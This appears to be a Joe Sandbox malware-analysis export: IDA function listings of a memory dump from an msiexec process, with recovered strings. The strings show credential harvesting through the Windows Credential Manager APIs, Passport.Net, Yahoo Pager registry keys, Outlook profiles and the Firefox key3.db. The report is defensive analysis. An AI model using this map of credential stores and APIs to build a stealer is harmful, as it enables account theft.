                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 438689982-0
                                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044495F
                                                                                                      • memset.MSVCRT ref: 00444978
                                                                                                      • memset.MSVCRT ref: 0044498C
                                                                                                        • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                                                      • strlen.MSVCRT ref: 004449A8
                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449CD
                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 004449E3
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                                                        • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                                                      • memcpy.MSVCRT(?,?,00000008,?,?,?,?,00000008,?,00000000,00000000), ref: 00444A23
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                        • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                        • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset$strlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 2142929671-0
                                                                                                      • Opcode ID: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                      • Instruction ID: aa4dc9b89352709bd4c521be83aedc2b1fb2a96970f66ede65b30d7c79a4835d
                                                                                                      • Opcode Fuzzy Hash: db1fe4889964b4b4561ff1fa413a374de4b2b8250443d72fdef4f343b664ad1c
                                                                                                      • Instruction Fuzzy Hash: 96513B7290015DAFDB10EF95CC81AEEB7B8FB44308F5445AAE509A7141EB34EA898F94
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                        • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                        • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                      • strlen.MSVCRT ref: 0040F7BE
                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                      • String ID: Passport.Net\*
                                                                                                      • API String ID: 2329438634-3671122194
                                                                                                      • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                      • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                      • Opcode Fuzzy Hash: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                                                                                      • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                      • String ID: Personalities
                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                      • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                      • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00430C59
                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00430A3D
                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00430A65
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                      • API String ID: 3510742995-272990098
                                                                                                      • Opcode ID: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                      • Instruction ID: 56a33166dce8f22c91c9f8fabbbf61fd3f81eb66f6c7064346fd2a8112c6bbd6
                                                                                                      • Opcode Fuzzy Hash: e0adb55311b2422536510ae49f56a80dd71403a501fe8d14b1b43f202caa477a
                                                                                                      • Instruction Fuzzy Hash: 32A14A71A00209DFCB14DF98D5909AEBBF1FF49704F24925EE805AB312D739EA41CB98
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: H
                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041384F: memcpy.MSVCRT(?,00417664,00000004,?,CwA,00417664,?,?,00417743,?,?,?,?), ref: 0041385C
                                                                                                      • memcmp.MSVCRT(?,?,00000004,00000000,?,?,0041DE5E,?,?,?,?,00436073), ref: 0041DBAE
                                                                                                      • memcmp.MSVCRT(?,SQLite format 3,00000010,00000000,?,?,0041DE5E,?,?,?), ref: 0041DBDB
                                                                                                      • memcmp.MSVCRT(?,@ ,00000003,?,?,?,00000000,?,?,0041DE5E,?,?,?), ref: 0041DC47
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: @ $SQLite format 3
                                                                                                      • API String ID: 231171946-3708268960
                                                                                                      • Opcode ID: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                      • Instruction ID: bab8e9e22e0f3e3322208b515ecc9156aa125374c4e71f07eecd891e4e8170cf
                                                                                                      • Opcode Fuzzy Hash: 88de2badfc1d71e4fe38edb0c0075e708ac09094af51dabb08af60798be72297
                                                                                                      • Instruction Fuzzy Hash: 1851BFB1E002099BDB20DF69C981BEAB7F4AF54304F10056FE44597742E7B8EA85CB98
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                      • API String ID: 438689982-3457389245
                                                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: winRead
                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                      • memset.MSVCRT ref: 0040AB9C
                                                                                                        • Part of subcall function 00411004: memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                        • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                        • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                      • sprintf.MSVCRT ref: 0040ABE1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
                                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                      • API String ID: 3337535707-2769808009
                                                                                                      • Opcode ID: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                      • Instruction ID: d3fada9700ccfca67da5e06a008153287a477451e6e6bd371d19fa9d49944530
                                                                                                      • Opcode Fuzzy Hash: 2bb92dba7cae12865da671c0fcd3b112093d4a92d1dc9d46927f4f4684118477
                                                                                                      • Instruction Fuzzy Hash: 50110631A00216BFEB11AF18CD42F99BB64FF0831CF10402AF509665A1DB79B970CB98
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValuememset
                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID$`{/h
                                                                                                      • API String ID: 3363972335-889311285
                                                                                                      • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                      • Opcode Fuzzy Hash: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                                                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                      APIs
                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                      • String ID:
                                                                                                      • API String ID: 4247780290-0
                                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                                                                                                        • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                                                                                                        • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                                                                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                                                                                                        • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                                                                                                        • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                                                                                                        • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                      • SetCursor.USER32(?,?,0040CBD2), ref: 0040B9F9
                                                                                                      • SetFocus.USER32(?,?,?,0040CBD2), ref: 0040BA0B
                                                                                                      • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                                                                                                      • String ID:
                                                                                                      • API String ID: 2374668499-0
                                                                                                      • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                      • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                                                                                                      • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                                                                                                      • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                      • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                                                                                                      • Opcode Fuzzy Hash: b88760ef2a9cfab350ce0474c381e2ce36942e7c393404a0687f9da8e94e787a
                                                                                                      • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                                                                                                      APIs
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A3E
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A4C
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A5D
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A74
                                                                                                        • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,?,00409C2C), ref: 00409A7D
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AB3
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AC6
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AD9
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,004041EB), ref: 00409AEC
                                                                                                      • free.MSVCRT ref: 00409B00
                                                                                                        • Part of subcall function 00407A55: free.MSVCRT ref: 00407A5C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@$free
                                                                                                      • String ID:
                                                                                                      • API String ID: 2241099983-0
                                                                                                      • Opcode ID: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                                                      • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                                                                                                      • Opcode Fuzzy Hash: 31fdcc5134ad351e7c18f58886b056bef117553105c5edd8e205bd7bfa1d52a3
                                                                                                      • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                                                                                                      APIs
                                                                                                        • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                                                                                        • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                                                                                        • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                                                                                      • GetSysColor.USER32(00000005), ref: 004107A6
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                                                                                      • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$BrushClassModeNameText_strcmpimemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2775283111-0
                                                                                                      • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                      • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                                                                                      • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                                                                                      • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                                                                                      APIs
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                      • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                                      • API String ID: 885266447-2471937615
                                                                                                      • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                      • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                                                                                      • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                                                                                      • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                                                                                      APIs
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
